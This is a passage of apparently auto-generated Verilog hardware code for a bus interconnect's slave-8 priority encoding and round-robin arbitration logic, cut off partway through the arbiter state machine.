            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[3] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[3]) ) 
        begin
            s8_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[4] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[4]) ) 
        begin
            s8_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[4] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[4]) ) 
        begin
            s8_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[5] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[5]) ) 
        begin
            s8_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[5] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[5]) ) 
        begin
            s8_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[6] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[6]) ) 
        begin
            s8_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[6] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[6]) ) 
        begin
            s8_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[7] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[7]) ) 
        begin
            s8_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[7] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[7]) ) 
        begin
            s8_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s8_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd0_pri_out_d0 ) : ( s8_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s8_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd1_pri_out_d0 ) : ( s8_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd2_pri_out_d0 ) : ( s8_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd3_pri_out_d0 ) : ( s8_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd4_pri_out_d0 ) : ( s8_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd5_pri_out_d0 ) : ( s8_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd6_pri_out_d0 ) : ( s8_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd7_pri_out_d0 ) : ( s8_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd0_pri_out_d0 ) : ( s8_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s8_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd1_pri_out_d0 ) : ( s8_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd2_pri_out_d0 ) : ( s8_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd3_pri_out_d0 ) : ( s8_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd4_pri_out_d0 ) : ( s8_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd5_pri_out_d0 ) : ( s8_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd6_pri_out_d0 ) : ( s8_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd7_pri_out_d0 ) : ( s8_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s8_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s8_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s8_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s8_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s8_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s8_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s8_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd0_pri_out_d0 ) : ( s8_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s8_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd1_pri_out_d0 ) : ( s8_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd2_pri_out_d0 ) : ( s8_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd3_pri_out_d0 ) : ( s8_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd4_pri_out_d0 ) : ( s8_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd5_pri_out_d0 ) : ( s8_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd6_pri_out_d0 ) : ( s8_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s8_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s8_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s8_msel_pri_enc_pd7_pri_out_d0 ) : ( s8_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s8_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s8_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s8_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s8_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s8_next ) 
            begin
                s8_msel_pri_out <= ( ( ( s8_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s8_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s8_msel_pri_enc_pri_out0 ) : ( s8_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s8_msel_arb0_req = { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd0 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd0 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd0 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd0 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd0 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd0 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd0 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd0 ) ) };
    assign s8_msel_arb0_gnt = s8_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s8_msel_arb0_state <= s8_msel_arb0_grant0;
        end
        else
        begin 
            s8_msel_arb0_state <= s8_msel_arb0_next_state;
        end
    end
    always @ (  s8_msel_arb0_state or  { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd0 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd0 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd0 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd0 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd0 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd0 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd0 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s8_msel_arb0_next_state = s8_msel_arb0_state;
        case ( s8_msel_arb0_state ) 
        s8_msel_arb0_grant0:
        begin
            if (  !( s8_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[1] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[2] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[3] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[4] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[5] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[6] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[7] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant1:
        begin
            if (  !( s8_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[2] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[3] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[4] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[5] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[6] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[7] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[0] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant2:
        begin
            if (  !( s8_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[3] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[4] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[5] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[6] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[7] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[0] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[1] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant3:
        begin
            if (  !( s8_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[4] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[5] ) 
                    begin
